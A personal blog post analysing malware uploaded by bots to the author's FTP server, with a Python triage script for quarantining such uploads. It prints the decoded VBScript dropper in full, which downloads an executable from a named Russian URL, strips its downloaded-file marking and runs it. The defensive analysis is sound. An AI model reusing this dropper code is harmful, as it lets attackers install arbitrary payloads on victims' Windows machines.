Ok, now that you've waited long for a post, I guess your expectations are equally low. So here's The World's Least Exciting Adventure in reverse-engineering and hacking exploration.
You see, I run an FTP server. It comes in quite handy when moving files quickly between platforms that lack the necessary tools for things like ssh/scp and so on. Like an Amiga 600, for example.
Anyway, on this FTP server I have foolishly allowed for anonymous FTP uploads. Not downloads, mind you, I have no interest in serving files for the dark web and ending up on the naughty list. Once a file is uploaded it is unreadable for anonymous users.
I visit the incoming directory once every blue moon, just to clean up the mess of files uploaded by what are apparently bots. Files like Photo.scr, GXHLGSL.txt, info.zip, IMG001.exe and so on. I remove them, but they reappear after a while, when the next bot stops by.
The uploaded files are obviously viruses, ransomware, backdoor installers or something along those lines, but curiosity got the best of me, so I executed IMG001.exe to see what happened.
Just kidding, I didn't execute it, but I ran the Linux strings command on it, just to have a peek at its contents and maybe get a clue. After scrolling through a couple of pages of garbage, some interesting data started to appear -- there were traces of an installer! This file is actually generated by a genuine installer, NSIS version 2.46.
What's even better is that 7zip will gladly extract the installer package without hesitation. Not the installer script per se, but the contents embedded.
I was left with one file, info.vbe, which I suspect the installer would have configured to be executed automatically, maybe as a start-up item. The .vbe extension means this file is an encoded Visual Basic script, so it's unreadable as-is. Luckily, a guy called Didier Stevens wrote a decoder in Python, which runs just fine under Linux. Running his script on the vbe file revealed the following short but simple script:
Set WshShell = CreateObject("WScript.Shell")
If Instr(1,WScript.FullName,"WScript.exe",1)>0 Then
    WshShell.Run "CScript """&WScript.ScriptFullName&"""",0: WScript.Quit
End if
Tmp=WshShell.ExpandEnvironmentStrings("%TEMP%")&"\tmp2.exe"
strFileURL = "http://www.testswork.ru/tmp2.exe"
strHDLocation = Tmp
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0
    Set objFSO = Createobject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
Echo=DosCommand("cmd /c (echo [ZoneTransfer] & echo ZoneId=0) > "&Tmp&":Zone.Identifier",2000)
Echo=DosCommand("cmd /c "&Tmp&" ",2000)
WScript.Quit
Function DosCommand(command,sleep)
    Set WshExec=WshShell.Exec(command): WScript.Sleep sleep: WshExec.Terminate()
    DosCommand=WshExec.StdOut.ReadAll
In short, it tries to download tmp2.exe from a (presumably compromised) website in Russia into %TEMP%, writes a Zone.Identifier stream with ZoneId=0 so Windows treats the file as local rather than downloaded, and then executes it. What this tmp2.exe file does is hard to tell, as it had been deleted from the web server at the time of testing. As I mentioned earlier, I guess we could expect some sort of ransomware, virus, botnet client, crypto miner or something similar.
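Added here as an example of the defender's side of this (my code, not anything from the post): a Python triage script for the incoming directory that flags and quarantines uploads by their bytes, using the PE "MZ" header, the "NullsoftInst" marker in an NSIS first header and the "#@~^" prefix of Script Encoder .vbe files, without ever running anything. The file names and contents built in demo() are constructed stand-ins for the bot uploads, not real samples.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

# Byte markers used for triage (from the public file formats, not from the post):
# PE files start with "MZ"; an NSIS installer's first header holds 0xDEADBEEF
# followed by "NullsoftInst"; Script Encoder output (.vbe) starts with "#@~^".
NSIS_MARKER = b"\xef\xbe\xad\xdeNullsoftInst"
VBE_MARKER = b"#@~^"
RISKY_EXT = {".exe", ".scr", ".vbe", ".vbs", ".js", ".jse", ".bat", ".cmd", ".pif", ".com"}


def classify(name: str, data: bytes) -> list:
    """Return the indicators found in one upload, without executing it."""
    findings = []
    if data[:2] == b"MZ":
        findings.append("pe-executable")
    if NSIS_MARKER in data:
        findings.append("nsis-installer")
    if data.startswith(VBE_MARKER):
        findings.append("encoded-vbscript")
    if Path(name).suffix.lower() in RISKY_EXT:
        findings.append("risky-extension")
    return findings


def sweep(incoming: Path, quarantine: Path) -> list:
    """Triage every file in incoming; move flagged ones to quarantine, report all."""
    quarantine.mkdir(parents=True, exist_ok=True)
    reports = []
    for path in sorted(p for p in incoming.iterdir() if p.is_file()):
        data = path.read_bytes()
        report = {"name": path.name, "sha256": hashlib.sha256(data).hexdigest(),
                  "findings": classify(path.name, data)}
        if report["findings"]:
            # Append a neutral suffix so nothing in quarantine keeps an executable extension.
            dest = quarantine / (path.name + ".quarantined")
            shutil.move(str(path), str(dest))
            report["quarantined_as"] = str(dest)
        reports.append(report)
    return reports


def demo() -> list:
    """Run the sweep over constructed sample files in a fresh temporary directory."""
    root = Path(tempfile.mkdtemp())
    incoming, quarantine = root / "incoming", root / "quarantine"
    incoming.mkdir()
    # Constructed stand-ins for the bot uploads named in the post; no real payloads.
    (incoming / "IMG001.exe").write_bytes(b"MZ" + b"\x00" * 62 + NSIS_MARKER + b"\x00" * 16)
    (incoming / "info.vbe").write_bytes(VBE_MARKER + b"constructed==$~")
    (incoming / "README.txt").write_bytes(b"just a text file left by a human\n")
    return sweep(incoming, quarantine)
```

Run demo() to see the reports; the sha256 values give you something to search for before the next bot drops the same file again.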
Super simple, super stupid. But since it's a thing, I guess it works.
The next time the file appears I'll be quicker and have a look at the file it wants to download as well.
Maybe you've experienced the same and wanted to know, too. In that case, now you do - at least a portion of it.